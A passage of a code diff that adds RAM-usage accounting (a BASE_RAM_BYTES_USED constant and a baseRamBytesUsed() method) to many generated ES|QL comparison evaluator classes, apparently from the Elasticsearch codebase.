RamUsageEstimator.shallowSizeOfInstance(EqualsLongsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsMillisNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsMillisNanosEvaluator.java index 91cd4614cc9d5..a00e33fa9e6cf 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsMillisNanosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsMillisNanosEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class EqualsMillisNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(EqualsMillisNanosEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsNanosMillisEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsNanosMillisEvaluator.java index cdcc4c931fb19..07ad8d201e33c 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsNanosMillisEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/EqualsNanosMillisEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class EqualsNanosMillisEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(EqualsNanosMillisEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanDoublesEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanDoublesEvaluator.java index e3f1649048c9d..1e8f09cb6e297 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanDoublesEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanDoublesEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class GreaterThanDoublesEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(GreaterThanDoublesEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, DoubleBlock lhsBlock, DoubleBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanIntsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanIntsEvaluator.java index 5014310820b06..c8cbbcf15815c 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanIntsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanIntsEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class GreaterThanIntsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(GreaterThanIntsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, IntBlock lhsBlock, IntBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanKeywordsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanKeywordsEvaluator.java index d99a2ff6bda70..95432b0f2c33e 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanKeywordsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanKeywordsEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class GreaterThanKeywordsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(GreaterThanKeywordsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -60,6 +63,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock lhsBlock, BytesRefBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { BytesRef lhsScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanLongsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanLongsEvaluator.java index 7d202da760601..154dcaf68b32e 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanLongsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanLongsEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class GreaterThanLongsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(GreaterThanLongsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanMillisNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanMillisNanosEvaluator.java index c8c337f2af085..96ffadd9637de 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanMillisNanosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanMillisNanosEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class GreaterThanMillisNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(GreaterThanMillisNanosEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanNanosMillisEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanNanosMillisEvaluator.java index 54683dd07523a..a828da91e5813 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanNanosMillisEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanNanosMillisEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class GreaterThanNanosMillisEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(GreaterThanNanosMillisEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualDoublesEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualDoublesEvaluator.java index 10ec48cbbb8dd..704df37c48e89 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualDoublesEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualDoublesEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class GreaterThanOrEqualDoublesEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(GreaterThanOrEqualDoublesEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, DoubleBlock lhsBlock, DoubleBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualIntsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualIntsEvaluator.java index 9ae1c86788d86..ae37b8a9124b2 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualIntsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualIntsEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class GreaterThanOrEqualIntsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(GreaterThanOrEqualIntsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, IntBlock lhsBlock, IntBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualKeywordsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualKeywordsEvaluator.java index e4fba4970409b..6b1ea2be71bff 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualKeywordsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualKeywordsEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class GreaterThanOrEqualKeywordsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(GreaterThanOrEqualKeywordsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -60,6 +63,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock lhsBlock, BytesRefBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { BytesRef lhsScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualLongsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualLongsEvaluator.java index 085e41ec5fc20..00f638132043d 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualLongsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualLongsEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class GreaterThanOrEqualLongsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(GreaterThanOrEqualLongsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualMillisNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualMillisNanosEvaluator.java index ffb411ca82d42..c51b15301202c 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualMillisNanosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualMillisNanosEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class GreaterThanOrEqualMillisNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(GreaterThanOrEqualMillisNanosEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualNanosMillisEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualNanosMillisEvaluator.java index 1419308f4ba4a..088538ad41416 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualNanosMillisEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualNanosMillisEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class GreaterThanOrEqualNanosMillisEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(GreaterThanOrEqualNanosMillisEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InsensitiveEqualsConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InsensitiveEqualsConstantEvaluator.java index 1199a9d5ab7d1..03bc373bd2559 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InsensitiveEqualsConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InsensitiveEqualsConstantEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.apache.lucene.util.automaton.ByteRunAutomaton; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; @@ -26,6 +27,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class InsensitiveEqualsConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(InsensitiveEqualsConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -55,6 +58,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock lhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { BytesRef lhsScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InsensitiveEqualsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InsensitiveEqualsEvaluator.java index 8c7abcfe891d5..ee758e218a7c2 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InsensitiveEqualsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InsensitiveEqualsEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class InsensitiveEqualsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(InsensitiveEqualsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -60,6 +63,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock lhsBlock, BytesRefBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { BytesRef lhsScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanDoublesEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanDoublesEvaluator.java index 7f0b7e8f66b66..6ef61e2519f1b 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanDoublesEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanDoublesEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class 